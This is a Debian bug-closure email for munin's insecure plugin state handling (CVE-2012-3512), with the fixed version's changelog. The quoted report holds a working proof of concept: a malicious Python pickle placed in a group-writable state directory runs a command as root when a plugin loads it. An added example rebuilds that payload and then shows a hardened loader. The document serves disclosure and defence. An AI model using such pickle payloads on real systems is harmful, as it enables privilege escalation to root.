Your message dated Thu, 30 Aug 2012 08:48:19 +0000
with message-id <e1t70qf-0002bu...@franck.debian.org>
and subject line Bug#684075: fixed in munin 2.0.6~git-1
has caused the Debian Bug report #684075,
regarding munin: insecure state file handling, munin->root
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
684075: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684075
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: munin-plugins-core
Version: 1.4.5-3
Severity: grave
Tags: upstream security
X-Debbugs-CC: hel...@subdivi.de
Hello, copying kenyon's report from
http://www.munin-monitoring.org/ticket/1234 :
Currently, plugins which run as root mix their state files in the same
directory as non-root plugins. The state directory is owned by
munin:munin and is group-writable. Because of these facts, it is
possible for an attacker who operates as user munin to cause a
root-run plugin to run arbitrary code as root.
A proof-of-concept example is the smart_ plugin. It must run as root
to access disk SMART data. It also stores state in Python pickle
format, which can store executable Python code. Example follows:
# su -s /bin/sh -c /bin/sh munin
$ cd /var/lib/munin/plugin-state
$ mv smart-sda.state smart-sda.state.orig
$ cat bla.py
import pickle
import subprocess
import sys

class RunBinSh(object):
    # unpickling reconstructs the object by calling subprocess.Popen(...),
    # so whoever loads this state file runs the command as their own uid
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh', '-c', 'id > /tmp/whoami'),))

pickle.dump(RunBinSh(), sys.stdout)
$ python bla.py > smart-sda.state
# wait for node to run smart_ plugin
$ cat /tmp/whoami
uid=0(root) gid=110(munin) groups=0(root),110(munin)
A possible solution is to have a directory dedicated to each plugin,
especially plugins which may run with superuser privileges, so that
less-privileged users cannot modify their state files. This cannot be
enforced by munin on all plugins, but this can be enforced by munin
developers for plugins shipped with the munin package. We should
consider making it easy for plugin writers to do this, maybe by making
the perl/bourne shell/other language munin plugin API use a dedicated
plugin state directory for each plugin. Otherwise, a plugin could be
hardcoded to create and use a subdirectory of the existing
plugin-state directory.
Thanks to "cnu" on the munin IRC channel for raising this issue and
providing the smart_ example.
--- End Message ---
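The report above describes the whole chain: a shared, group-writable state directory, a root-run plugin that trusts whatever it finds there, and a serialization format (pickle) in which the stored "data" can be a call to subprocess.Popen. The following is an added example, not code from munin and not the reporter's PoC. It shows the same payload shape executing under the 1.4.5-era loading pattern, and a hardened loader whose directory checks follow the fix recorded in the changelog below (one state directory per plugin uid, owned by that uid). Replacing pickle with JSON, the helper names (state_dir_problems, load_state_hardened and so on) and the use of temporary directories instead of /var/lib/munin are this example's own assumptions, not something the report or the changelog states.

```python
"""Added example for #684075; not munin's code. Assumptions are in the lead-in."""
import json
import os
import pickle
import stat
import subprocess
import tempfile

class RunCommand:
    """Same trick as the PoC: __reduce__ makes the unpickler call Popen."""
    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        return (subprocess.Popen, (self.argv,))

def malicious_state(marker_path):
    """State-file bytes that create marker_path when unpickled (harmless stand-in for 'id > /tmp/whoami')."""
    return pickle.dumps(RunCommand(["sh", "-c", f"touch '{marker_path}'"]))

def load_state_vulnerable(path):
    """The 1.4.5-era pattern: pickle.load on a file another uid could have written."""
    with open(path, "rb") as f:
        return pickle.load(f)

def demo_vulnerable():
    """True if merely loading the crafted state ran the attacker's command."""
    with tempfile.TemporaryDirectory() as d:  # constructed stand-in for plugin-state/
        marker = os.path.join(d, "whoami")
        state = os.path.join(d, "smart-sda.state")
        with open(state, "wb") as f:
            f.write(malicious_state(marker))
        proc = load_state_vulnerable(state)  # the loaded 'state' is a live Popen object
        proc.wait()
        return os.path.exists(marker)

WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

def state_dir_problems(statedir):
    """Why statedir cannot be trusted as this uid's private dir ([] means ok); models the per-uid dir of the fix."""
    problems = []
    st = os.lstat(statedir)  # lstat: a symlink standing in for the dir is itself a problem
    if not stat.S_ISDIR(st.st_mode):
        problems.append("not a directory (or is a symlink)")
    if st.st_uid != os.geteuid():
        problems.append(f"owned by uid {st.st_uid}, not {os.geteuid()}")
    if st.st_mode & WRITABLE_BY_OTHERS:
        problems.append("group- or world-writable")
    return problems

def _private_file(statedir, name, flags, mode=0o600):
    problems = state_dir_problems(statedir)
    if problems:
        raise PermissionError(f"{statedir}: " + "; ".join(problems))
    path = os.path.join(statedir, os.path.basename(name))
    return os.open(path, flags | os.O_NOFOLLOW | os.O_CLOEXEC, mode)  # never follow a planted symlink

def save_state_hardened(statedir, name, obj):
    fd = _private_file(statedir, name, os.O_WRONLY | os.O_CREAT | os.O_TRUNC)
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        json.dump(obj, f)  # JSON carries data only, never callables

def load_state_hardened(statedir, name):
    fd = _private_file(statedir, name, os.O_RDONLY)
    with os.fdopen(fd, "rb") as f:
        st = os.fstat(f.fileno())  # check the file we actually opened, not the path (no TOCTOU window)
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
            raise PermissionError(f"{name}: not a regular file owned by uid {os.geteuid()}")
        if st.st_mode & WRITABLE_BY_OTHERS:
            raise PermissionError(f"{name}: group- or world-writable")
        return json.loads(f.read().decode("utf-8"))

def demo_hardened():
    """Exercise the hardened loader; every value in the result should be True."""
    r = {}
    with tempfile.TemporaryDirectory() as d:  # constructed stand-in for the new state root
        private = os.path.join(d, str(os.geteuid()))
        os.mkdir(private, 0o700)
        save_state_hardened(private, "smart-sda.state", {"reallocated": 0})
        r["roundtrip"] = load_state_hardened(private, "smart-sda.state") == {"reallocated": 0}
        marker = os.path.join(d, "whoami")
        with open(os.path.join(private, "evil.state"), "wb") as f:
            f.write(malicious_state(marker))
        try:
            load_state_hardened(private, "evil.state")
            r["pickle_rejected"] = False
        except ValueError:  # JSONDecodeError/UnicodeDecodeError: parsed and refused, not executed
            r["pickle_rejected"] = not os.path.exists(marker)
        os.symlink("smart-sda.state", os.path.join(private, "link.state"))
        try:
            load_state_hardened(private, "link.state")
            r["symlink_rejected"] = False
        except OSError:  # O_NOFOLLOW fails with ELOOP
            r["symlink_rejected"] = True
        shared = os.path.join(d, "plugin-state")  # the 1.4.5 layout: one group-writable dir
        os.mkdir(shared)
        os.chmod(shared, 0o775)
        r["shared_dir_rejected"] = "group- or world-writable" in state_dir_problems(shared)
    return r
```

demo_vulnerable() returns True when the crafted pickle ran its command on load; demo_hardened() returns four checks that should all be True. Two points carry over to any plugin language: verify ownership and mode on the descriptor you actually opened (fstat after O_NOFOLLOW), not on a path that another user can swap underneath you, and remember that a per-uid directory is only as trustworthy as its parents, which is why the changelog below has the new state root owned by uid 0.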
--- Begin Message ---
Source: munin
Source-Version: 2.0.6~git-1
We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 684...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Holger Levsen <hol...@debian.org> (supplier of updated munin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Thu, 30 Aug 2012 08:26:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6~git-1
Distribution: experimental
Urgency: low
Maintainer: Munin Debian Maintainers <packag...@munin-monitoring.org>
Changed-By: Holger Levsen <hol...@debian.org>
Description:
munin - network-wide graphing framework (grapher/gatherer)
munin-async - network-wide graphing framework (async master/client)
munin-common - network-wide graphing framework (common)
munin-doc - network-wide graphing framework (documentation)
munin-node - network-wide graphing framework (node)
munin-plugins-core - network-wide graphing framework (plugins for node)
munin-plugins-extra - network-wide graphing framework (user contributed plugins for nod
munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes:
munin (2.0.6~git-1) experimental; urgency=low
.
* 2.0.6 is actually unreleased still, this is based on the current git
commit 6183662. The following fixes are included:
- munin-node: more secure state file handling, introducing a new plugin
state directory root, owned by uid 0. Then each plugin runs in its own
UID plugin state directory, owned by the said UID. (Closes: #684075),
(Closes: #679897), closes CVE-2012-3512.
- munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
thanks to Helmut Grohne <hel...@subdivi.de>
- munin-cron: call munin-graph with --cron argument (Closes: #685343)
- Master/Node.pm: fix _node_read_fast() to accept all valid returns
(Closes: #686089) and _do_connect() to not use an uninitialized
variable. (Closes: #686090)
- munin-async: make spoolread less restrictive about (valid) plugin names
(Closes: #686093)
* Update Location and Scriptalias in shipped apache.conf to reflect changes
introduced upstream in 64dfec73 coming in 2.0.6. This fixes a regression
introduced in fixing #682869.
Checksums-Sha1:
87f92bd652589be479511fd928f17ca9e62172ef 2129 munin_2.0.6~git-1.dsc
e28fb8500f1363a905f2be164c3f0ec4780aca5c 1422644 munin_2.0.6~git-1.tar.gz
495b3c699c5db9706db03d9d2eeab149a3d8c113 126252 munin-node_2.0.6~git-1_all.deb
76a3d3fcd400f5221ba5d7424c30e0b5339b9b43 302894 munin-plugins-core_2.0.6~git-1_all.deb
dc01c511e671c0a677dfc6cf7fec360077934e6f 152910 munin-plugins-extra_2.0.6~git-1_all.deb
71b1c478d9a7abd4d901d954ab52f6d84479559a 145808 munin-plugins-java_2.0.6~git-1_all.deb
6d24d5033c9387d8e8f3910373646b74c74cbf13 200446 munin_2.0.6~git-1_all.deb
5954e9803442dbd4fe7f24adbd0b1bc9fc6a7c1b 93692 munin-common_2.0.6~git-1_all.deb
acf0ac69dd6e51a091bb55699f1ba7ccd32e5efb 81604 munin-async_2.0.6~git-1_all.deb
1fe472bce2797dd2929955e7101a70f0e5283e2a 210798 munin-doc_2.0.6~git-1_all.deb
Checksums-Sha256:
e788a52a42e577702b03df2a76b902ecfb75d7d554bab56ab218a96857ceb1d4 2129 munin_2.0.6~git-1.dsc
2fba10446f70b872d7fd0c2aef3e6d7fd6d19363a98228d8079d16be1c431943 1422644 munin_2.0.6~git-1.tar.gz
c5e3df113333b5fb286c943ef1e252f9caa981c83c5ac47d24a77e6fdb3cb058 126252 munin-node_2.0.6~git-1_all.deb
8adfd149197072b108d26ea402393cc40b203c652bee10b3e67c56da9a75744e 302894 munin-plugins-core_2.0.6~git-1_all.deb
343093da2cdca0dfe21d32c8ea2b4f14e9c1b6e202fea45b10f68bea4f85690f 152910 munin-plugins-extra_2.0.6~git-1_all.deb
50d926265834e95a642617a575d8fc29c6bec0ca4e97b914da26135526cd3ee0 145808 munin-plugins-java_2.0.6~git-1_all.deb
7b8fa95370adb1eaff00091d99a3543ab6b62850f7d09e873b8a375c4fc81d52 200446 munin_2.0.6~git-1_all.deb
e8e501fc937dbd964b2e8092385e15b4edf99dd26307e28e79b245c092d714f6 93692 munin-common_2.0.6~git-1_all.deb
3fb62447d4df6d00b89de1be7acac538bcd1dafddcef92217e97aacfa9dbe094 81604 munin-async_2.0.6~git-1_all.deb
f7d126effa2b2924a5964fa09b427d3dad62195c2e15c3a7254ccb767e91ad33 210798 munin-doc_2.0.6~git-1_all.deb
Files:
cb7b1f41569d38be6104d578543c637a 2129 net optional munin_2.0.6~git-1.dsc
61aa2c32d0a415d7e14d424cf771bbb1 1422644 net optional munin_2.0.6~git-1.tar.gz
55c3fa84967745332b796b21249fa85a 126252 net optional munin-node_2.0.6~git-1_all.deb
3b271a0f6b4746bbe1e0fc5eea4ca72f 302894 net optional munin-plugins-core_2.0.6~git-1_all.deb
d39bfbb398a5c30e1ce985ca87e703d3 152910 net optional munin-plugins-extra_2.0.6~git-1_all.deb
26fe11792149f134c3cf34988c528006 145808 net optional munin-plugins-java_2.0.6~git-1_all.deb
349a40dc4c3bbdcd0640fca8e2936ac9 200446 net optional munin_2.0.6~git-1_all.deb
a86b0f6d30e1a94610fca9ef491e49fe 93692 net optional munin-common_2.0.6~git-1_all.deb
c0a03eb040ff1a0e098b9287f0ea4230 81604 net optional munin-async_2.0.6~git-1_all.deb
3076757e3fe6a060197ee96b55473490 210798 doc optional munin-doc_2.0.6~git-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

=XPYG
-----END PGP SIGNATURE-----
--- End Message ---